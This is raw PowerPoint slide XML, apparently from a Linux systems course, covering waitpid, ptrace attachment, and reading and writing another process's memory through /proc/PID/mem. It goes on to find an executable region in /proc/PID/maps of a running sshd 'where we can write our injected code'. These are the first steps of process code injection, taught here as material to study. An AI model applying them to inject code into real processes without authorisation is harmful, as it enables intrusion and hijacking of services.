      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21892850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5496" y="2492896"/>
            <a:ext cx="9036496" cy="3888432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Suspends the calling process until a child process ends or is stopped. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>More precisely,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waitpid</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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>suspends the calling process until the system gets status information on the child. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the system already has status information on an appropriate child when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waitpid</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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is called,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waitpid</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returns immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>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waitpid</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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is also ended if the calling process receives a signal whose action is either to execute a signal handler or to end the process.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>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rPr>
              <a:t>waitpid</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 Wait for a Specific Child Process to End </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>IBM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30770882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標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process Completion Status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29632642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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There’s no standard, cross-platform debugging API for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-like systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Most have a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system call, though each works a little differently. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Note that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is not part of POSIX, but appeared in System V Release 4 (SVr4) and BSD, then copied elsewhere. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The following will all be specific to Linux, though the procedure is similar on other Unix-likes.</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to Read and Write Other Process Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11543061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In typical Linux fashion, if it involves other processes, you use the standard file API on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> filesystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Each process has a directory under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> named as its process ID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In this directory is a virtual file called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>”, which is a file view of that process’ entire address space, including unmapped regions.</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>File View of a Process’ Entire Address Space </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42806698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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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char file[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(file, "/proc/%</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ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/mem", (long)</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pid</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = open(file, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The catch is that while you can open this file, you can’t actually read or write on that file without attaching to the process as a debugger. You’ll just get EIO errors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>To attach, use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with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_ATTACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. This asynchronously delivers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SIGSTOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> signal to the target, which has to be waited on with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waitpid</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Attach a Process That You Want to Read or Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chris Wellons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39492055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Next, we need to find a place within the process where we can write our injected code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The easiest way to do this is to parse the “maps” file located in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>procfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for the target. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>For example, the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” file for a running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> process on Ubuntu looks like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844329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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Example of File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://res.cloudinary.com/xpnsec/image/upload/images/2017/03/map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924944"/>
            <a:ext cx="7877175" cy="2609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82168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We need to search for a section which is mapped with execute permission (likely this will be “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>”). </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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/PID/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31714304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6"/>
            <a:ext cx="8496944" cy="3939821"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(PTRACE_ATTACH,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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>waitpid</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pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
